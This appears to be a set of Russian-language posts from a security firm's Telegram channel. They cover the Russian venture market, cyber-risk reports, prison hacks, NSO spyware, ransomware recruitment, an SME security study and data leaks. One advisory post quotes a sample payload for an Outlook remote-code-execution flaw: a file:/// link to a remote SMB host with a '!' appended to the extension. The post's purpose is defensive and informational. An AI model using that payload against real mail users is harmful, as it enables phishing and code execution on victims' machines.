Российский венчур — между Кенией и Нигерией?

Этот пост будет немного не про ИБ как таковую, но он напрямую связан со многими молодыми и не очень ИБ-компаниями. Если коротко — он про то, что российская венчурная индустрия за несколько лет деградировала до уровня средней африканской страны. Ушли не только западные — ушли даже российские инвесторы. А те, кто остался, иногда прямо говорят: "будете выходить на международные рынки — приходите" (в целом норм предложение). А вообще, 5 сделок в месяц (в 2023 году в России) — это полный мрак. Для понимания, в США — около 600, в Израиле — около 30. Про объемы просто промолчу.

Венчурный инвестор — это человек, который пытается проинвестировать в компании на ранних стадиях. То есть найти условных Джобса и Возняка в тот момент, когда они еще сидят в гараже, и купить часть их компании. Все в выигрыше — компания получает деньги, инвестор — в перспективе получает прибыль. Короче, венчур — это про заработок на росте стоимости стартапов. Тут все понятно. И видно, что в России хотят построить индустрию, только пока не выходит.

А теперь прикол. Вокруг собственно венчурного инвестирования всегда развивается "поддерживающая" инфраструктура, задача которой — помогать компаниям расти и находить инвевторов. За последний год нас звали десятка в полтора акселераторов. В теории, аксель — это хороший способ для молодой компании получить консультации, инвестиции и связи. Разумеется, большая часть акселераторов — платные, причем зачастую они находятся или на прямой господдержке, или предлагают стартапам получить таковую. Проблема в том, что по факту аксель не дает доступа к инвестициям — потому что российский венчур, повторюсь, схлопнулся.

Получается смешная картина — на фактически мертвом рынке множество компаний продает ... ну не воздух, но нечто подобное. Акселераторы могут давать очень хорошую продуктовую экспертизу, вот только стартапу, которому нужны деньги для разработки продукта она поможет примерно как аспирин на 3 стадии рака. И в итоге получается, что "акселерация" превращается в отдельный бизнес, причем довольно (для компаний) бестолковый. Учиться на экономиста в 90-х было круто, учиться на экономиста в конце нулевых — грустно. Здесь та же история.

Мы вопрос с инвестициями для себя решили, хоть и немного "неортодоксально". Но текущее состояние венчурного рынка в России — это полный мрак. Может быть, через пару лет что-то изменится, а пока оно такое, какое есть.

Киберриски — топ-1 в мире по мнению страховой группы Allianz

Мы тут неожиданно наткнулись на отчет страховой группы Allianz по ключевым рискам в 2023 году, и с удивлением обнаружили, что по их мнению риски ИБ снова оказались главными угрозами среди всех возможных. На втором месте — прерывание бизнеса, дальше — макроэкономика, энергетические кризисы и изменения в регулировании (короче, санкции). К слову, за год снизились только "природные и стихийные" риски — изменение климата, катастрофы и пожары.

"Сайбер" не попал в топ-3 только для двух стран — Китая и Австралии. С Китаем все понятно (с их-то интернет-архитектурой), про Австралию мы знаем мало, но там в лидерах климат и природные катастрофы. В общем, такие дела, занимайтесь безопасностью.

Всем привет!

У нас тут вовсю идет стрим с Garantex про кибербезопасность и крипту.
Присоединяйтесь!

Взлом тюрьмы

В кино неоднократно показывали, как некий хакер ломает тюрьму, и толпы заключённых бегут на свободу!
Например, эпизод - "eps1.5_br4ve-trave1er.asf" сериала Мистер Робот.

В 2017 году злоумышленник из Мичигана попытался освободить своего друга из тюрьмы успешно взломав один из компьютеров администрации, с помощью классического двойного фишинга. Сначала было отправлено письмо, а потом он звонил в тюрьму и убедил сотрудников письмо открыть и запустить вредонос, объяснял все срочными обновлениями.
Далее получил учетные данные одного из сотрудников и распространил свой вирус на другие компьютеры администрации.

В итоге он получил доступ к:
- Системе XJail (осуществляет мониторинга и отслеживание заключённых)
- Данным о показаниях
- Внутренним данным тюрьмы

Собрал базу данных более чем 1500 сотрудников, включая их логины, пароли и персональные данные. А позднее он перешел к главной цели, изменил дату освобождения одного из заключенных - его друга.

Казалось бы успех? Но нет, в тюрьме было всего около 200 заключенных мужчин и они хорошо знали даты освобождения друг друга. Начали расследование об изменении данных, привлекли частную компанию для расследования, и злоумышленника быстро нашли.

Но, на днях случился еще один и уже УСПЕШНЫЙ эпизод освобождения. В 2020 году был задержан по подозрению в убийстве 30-летний Зайон Ривер Шака. Расследование шло своим чередом, подозреваемого регулярно возили в суд на слушания, пока судебные и телефонные и налоговые системы округа Клейтон Джорджии не были взломаны. Туда подозреваемого перевели временно, на время очередных слушаний. Взлом систем округа сопровождался не модификацией данных, а цитата "широкомасштабным отключением систем", скорее всего дело рук распространителей шифровальщиков.

И в результате недоступности данных подозреваемого случайно отпустили после слушания, а не вернули в тюрьму. В данный момент его местонахождение неизвестно, ведется розыск.

Теперь ожидаем эпизода целенаправленного освобождения, если уже почти получилось в 2017 и получилось, но случайно в 2024, то это явно вопрос времени!

Хакеры в кино

В прошлом посте, я упомянул сериал Мистер Робот. Это хороший пример того, как можно показывать кибербез в кино.

А недавно меня попросили высказаться про наиболее частый образ хакеров в кино, и спросили еще нескольких коллег с ИБ рынка.

А в конце статьи ссылка на гит, с неплохим спискам фильмов/сериалов хоть как-то связанных с хакерами, рекомендую!

Но квинтесенция стеба, как это выглядит тут - https://youtu.be/pgl37R7hILE.

Ой, а кто это сделал?!

Тут в Иордании очередной скандал, связанный с шпионским ПО от израильтян из NSO Group. Pegus использовали для слежки за оппозиционными активистами. Как говорится, никогда не было, и вот опять.

"Внезапно" выяснилось, что рано или поздно практически любая страна начинает использовать шпионский софт не только для борьбы с наркоторговцами и разными экстремистами, но и для слежки за политическими оппонентами правящей партии. Причем не важно, идет речь об Иордании или Мексике, или о демократической Польше. Разве что в ЕС скандал будет погромче.

Оказывается, если продавать кибероружие, то его могут использовать не по назначению. Ну, или очень даже по назначению.

Хочется добавить голосом Галустяна из Нашей Раши: "Ой, а кто это сделал?" И правда, очень неожиданно. Ничего же не предвещало.

3side медиа-партнер форума «ТЕРРИТОРИЯ БЕЗОПАСНОСТИ – 2024: все pro ИБ»

Разместили анонс и приглашаем поучаствовать!
От нас на Форуме будет Антон Бочкарев в качестве слушателя, смело подходите на нетворк.

❕4 апреля 2024 г. в Москве состоится Форум «ТЕРРИТОРИЯ БЕЗОПАСНОСТИ – 2024: все pro ИБ».

🗣 Спикеры КОНФЕРЕНЦИЙ 2024 ГОДА:
🔸 PRO расследования инцидентов: https://www.comnews-conferences.ru/tb2024/ri
🔹 PRO обнаружение угроз: https://www.comnews-conferences.ru/tb2024/ou
🔸 PRO управление уязвимостями: https://www.comnews-conferences.ru/tb2024/uu
🔹 PRO безопасную разработку: https://www.comnews-conferences.ru/tb2024/br

📍 HYATT REGENCY MOSCOW PETROVSKY PARK
💁‍♂️ Регистрация: https://www.comnews-conferences.ru/tb2024/registration
❗️Участие для руководителей ИБ-департаментов БЕСПЛАТНОЕ!
❗️ При оплате до 1 марта 2024 г. действует льготная стоимость участия для делегатов-слушателей!
✉️ Выступить с докладом на конференциях или стать экспонентном: conf@comnews.ru

Меняются технологии, люди остаются

Небольшой развлекательно-исторический лонг о том, как "ловили" первых хакеров и как ломали американскую оборонку. Спойлер: изменилось не так много, как может показаться.

https://telegra.ph/KGB-hakery-The-Illuminatus-02-12

В продолжение недавнего видеоинтервью для Garantex

Очень детальная и подробная подборка устройств с описанием их функций и преимуществ/недостатков. От себя повторим, что параллельный импорт-игрушка дьявола, и относиться к нему стоит очень — очень осторожно. А полную версию интервью можно посмотреть здесь.

Публичный эксплойт на критическую уязвимость Microsoft Outlook

Буквально сегодня в публичном доступе появился эксплойт в виде Poc (Proof of concept) для всех современных версий Outlook. Эксплойт позволяет выполнить удаленный код с правами приложения в обход всех проверок Майкрософт!

Оказалось, для обхода всех проверок и механизмов защиты достаточно в конец расширения документа добавить восклицательный знак. Пример исследователей Check Point: *<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*

От жертвы необходимо лишь нажать на ссылку в письме и код будет выполнен. Очевидно, что уязвимость будет максимально широко использоваться в фишинге.

Для защиты рекомендуется как можно быстрее установить обновление приложения.
Подробное описание уязвимости тут.
Оригинальное исследование тут.

Добро пожаловать на рынок кибербезопасности, Александр!

Если без иронии, то этот пост чуть более чем описывает состояние рынка услуг ИБ в России. Вы или ищете друга, у которого есть друг, и рассчитываете на порядочность всех участников цепочки, или платите "сантехнику" за 100500 рублей в час. Ну, или покупаете стартап по прочистке труб/нанимаете команду.

Сервисы (вроде 3side, но не только) не просто делают жизнь проще. Они исправляют ассиметрию информации и превращают "восточный базар" в эффективный рынок, на котором жить становится проще примерно всем.

Как российские кибервымогатели вербуют специалистов под видом легального бизнеса

Самое "прекрасное" в недавней истории про SugarLocker — не в том, как вымогатели работали, а в том, как они вербовали людей. А делали они это под видом вполне легальной компании с прекрасным названием Shtazi-IT. То есть еще раз, киберкриминал вполне официально мог давать объявление на условном HH. Кстати, история в России далеко не самая редкая, мы сами натыкались на "странные" вакансии.

К слову, в США тоже были похожие истории. Например, в 21 году там участник хакерской группировки FIN7 получил семь лет тюрьмы. На суде его адвокат заявлял, что в группировку тот попал случайно — после того, как откликнулся на объявление о вакансии в ИБ-компании Combi Security.

Мы это к чему. Вербовка ИБ-специалистов в рансом на вполне легальных площадках — это вполне себе современная действительность.

Статья на Хакере

По мотивам моего выступления на Highload написал статью в легендарный журнал Хакер. Статья для целевой аудитории журнала, стиль подбирал под нее же, добавил хакерскую специфику не типичную для этого канала.

Для меня это важное достижение, ведь еще подростком я читал журнал запоем и старался не пропускать каждый выпуск! Часть статей понять было сложно, а уж о том, чтобы написать туда и даже не мечтал. Когда я пришел в профессию, точно понял, что рано или поздно что-то туда напишу и внесу свой вклад. Но нужна была особенная достойная тема, наконец я ее нашел!

Журнал доступен по подписке, но насколько я знаю, через 2 месяца статья будет целиком доступна бесплатно!
https://xakep.ru/2024/02/21/mind-exploits/

Атаки не ради денег — мотивация киберпреступников изменилась?

Тут FACCT (ex Group-IB) выкатили любопытный отчет, в котором кроме прочего написана одна вещь, про которую мы очень давно говорили. Кибератаки теряют финансовую мотивацию, а вместе с профессиональными киберпреступниками (на любом этапе цепочки RAAS) начинают действовать хактивисты с разным уровнем подготовки.

Еще раз: большинство работающих по RU преступников делают это не для того, чтобы зашифровать, потом получить выкуп и заработать пару (десятков) миллионов долларов. В реальности, большинство из них делают это ради нанесения максимального ущерба. Все это приводит к тому, что размер целевых компаний существенно снижается: теперь не нужно атаковать только платежеспособных, а под угрозой оказывается практически любой средний и даже малый бизнес.

При этом, традиционные стратегии противодействия работают, и никакой серебряной пули тут нет. Чтобы заниматься быть защищенным, надо заниматься ИБ, инвестировать деньги (покупая продукты, услуги и нанимая компетентных профессионалов) и время. Причем в случае с небольшими компаниями это, очевидно, будет бремя менеджмента. Но другого пути нет.

А еще отчет подтвердил, что фишинг и социальная инженерия продолжают оставаться ключевой точкой "входа" в инфраструктуру компании — но это все и так знают.

Первое публичное исследование кибербезопасности МСП

Наконец-то — совместно с АСИ мы выпустили первое в России исследование защищенности компаний малого и среднего предпринимательства (МСП). Ранее никто публично не исследовал и не писал об этом, ведь все привыкли, что безопасность это для крупного бизнеса - энтерпрайза. Мы с этим совершенно не согласны.
Сам файл во вложении, методология внутри, многое можно обсуждать, а пока самое главное:

— МСП начали действительно часто ломать (45% атакованы, 15% понесли значимый ущерб), и это общемировой тренд
— Информирование важно: МСП хотят понять как работает ИБ
— На ИБ начинают тратить после уже произошедших инцидентов
— Более крупные МСП боятся за системы автоматизации (АСУТП и CRM), малые — за сайт

И еще куча всего про угрозы, расходы, самооценку и прочее. Мы разберем самое интересное в отдельных постах.

Управление секретами в компании, это крайне важно. Именно с ними зачастую наибольший беспорядок в молодых, но активно развивающихся компаниях!

Отлично, что опенсорс проекты в этом направлении тоже не менее активно развиваются.

Фишинг «фичи» Телеграма

Попытался добиться исправления пары небезопасных, с точки зрения социальной инженерии, функций. Пробовал через BugBounty - единую почту "security".
Теперь попробую привлечь внимание к проблеме через Habr!

Понятно, что это явно не в скоупе BugBounty, но цель поста - исправление, благо оно тут очень простое.

Утекла очередная база данных — на этот раз МФО

Судя по сообщениям в ТГ (раз, два) в доступе оказалась часть базы клиентов МФО "Займер". Всего предположительно утекли данные о 16 млн россиян / 14 млн уникальных телефонов. А потом так что не одними данными доставщиков и ковидных тестировщиков полнятся базы мошеннических колл-центров))

По ощущениям, масштаб утечек в 2024 году будет как минимум сопоставим с 2023. Возможно, крупные компании, банки и разного рода энтерпрайзы будут "течь" меньше, но вообще говоря операторов персональных данных в России не много, а очень-очень много. Так сказать, хватит на долгие годы утечек.

Но если это правда, и клиентами только одно, пусть и довольно крупного МФО, были 10+ млн человек — то у нас не очень хорошие новости о доступности банковских продуктов в РФ. Даже 10 млн россиян — это 13% экономически активного населения страны. Но вот это уже за пределами тематики канала.